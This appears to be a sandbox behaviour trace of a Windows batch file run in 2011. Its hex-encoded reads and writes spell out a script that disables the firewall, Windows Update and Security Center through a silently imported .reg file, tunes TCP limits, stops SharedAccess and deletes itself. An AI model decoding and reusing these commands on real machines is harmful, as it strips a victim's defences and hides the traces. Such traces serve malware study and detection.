File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609327504
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609327670
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61	success or wait	1609327839
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609332317
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609335221
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609335420
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609377291
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609402110
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609402342
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609403063
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609424637
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609424821
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53	success or wait	1609424992
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609432527
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609432740
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609432963
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609433652
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609434318
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609434492
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 112 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53 74 61 6E 64 61	success or wait	1609434928
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609456876
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609457056
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D	success or wait	1609457228
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609461438
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609461638
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609461833
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609462260
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609462883
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609463049
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 33 Value: 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1609463438
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609467721
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609467891
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D	success or wait	1609468064
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609473187
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609485971
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609486176
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609494421
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609495048
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609495221
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609495959
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609499941
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609500113
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74	success or wait	1609500284
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609504491
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609504692
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609504893
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609505318
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609505935
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609506103
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 66 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 0D 0A	success or wait	1609506504
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1609529176
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609534174
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609534797
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609534962
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	1609535333
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38	success or wait	1609540052
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609591492
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609592182
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609592382
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609593086
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72	success or wait	1609598064
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609603413
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609604060
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609604234
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 60 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 0D 0A	success or wait	1609604641
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66	success or wait	1609611964
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609661123
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609661970
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609662158
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	1609673879
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C	success or wait	1609721035
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609754560
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609755179
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609755345
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609756021
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F	success or wait	1609760615
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609777706
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609778539
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609778710
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 73 Value: 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 0D 0A	success or wait	1609779107
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53	success or wait	1609783652
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609794019
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609801335
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609801528
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 25 Value: 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1609801987
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72	success or wait	1609807273
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609819839
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609820442
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609820609
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609821270
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68	success or wait	1609825666
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609830706
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609833790
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609834209
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 74 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 0D 0A	success or wait	1609834615
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C	success or wait	1609862239
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609867531
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609868502
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609868670
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 30 Value: 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 0D 0A	success or wait	1609869068
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25	success or wait	1609877035
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609937318
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609937942
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609942098
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 35 Value: 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 0D 0A	success or wait	1609942575
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25	success or wait	1609968671
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609977061
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609977781
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609986610
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 36 Value: 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 0D 0A	success or wait	1609987497
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53	success or wait	1610006730
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1610011724
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1610013888
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1610016276
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 30 Value: 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 0D 0A	success or wait	1610016653
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1610022914
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1610035524
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1610036124
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1610036277
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1610036902
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1610041278
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1610090697
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 880000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1610093357
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1610094980
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 880000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1610098379
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1610115315
Section loaded	Path: C:\WINDOWS\regedit.exe Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 147456 Protection: execute Mapped to pid: own pid	success or wait	1610121394
Section loaded	Path: C:\WINDOWS\regedit.exe Access: query and read Type: commit Baseaddress: 9B0000 Size: 147456 Protection: readonly Mapped to pid: own pid	success or wait	1610129573
Section loaded	Path: C:\WINDOWS\regedit.exe Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 147456 Protection: execute Mapped to pid: own pid	success or wait	1610346441
Section loaded	Path: C:\WINDOWS\regedit.exe Access: query and read Type: commit Baseaddress: 9B0000 Size: 147456 Protection: readonly Mapped to pid: own pid	success or wait	1610351055
Process created	PID: 1500 Path: C:\WINDOWS\regedit.exe Cmdline: REGEDIT /S C:\WINDOWS\TEMP\7684d.reg Createflags: suspended	success or wait	1610423150
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1619805947
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point	success or wait	1619849738
File deleted	Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1619854842
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 44 45 4C 20 25 30 0D 0A 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1619888165
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1619902714
File opened	Path: c:\sdfeww.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point	success or wait	1619904694
File deleted	Path: C:\sdfeww.bat	success or wait	1619908799
File opened	Path: c:\sdfeww.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	wait	1619937874
File write	Path: 1292 Offset: none Length: 33 Value: 54 68 65 20 62 61 74 63 68 20 66 69 6C 65 20 63 61 6E 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E 0D 0A	invalid handle	1619949223

Analysis File: net.exe PID: 1468 Parent PID: 1944

Sections

General
Start time:	07:41:17
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net stop SharedAccess
Imagebase:	0x1000000
File size:	42496 bytes
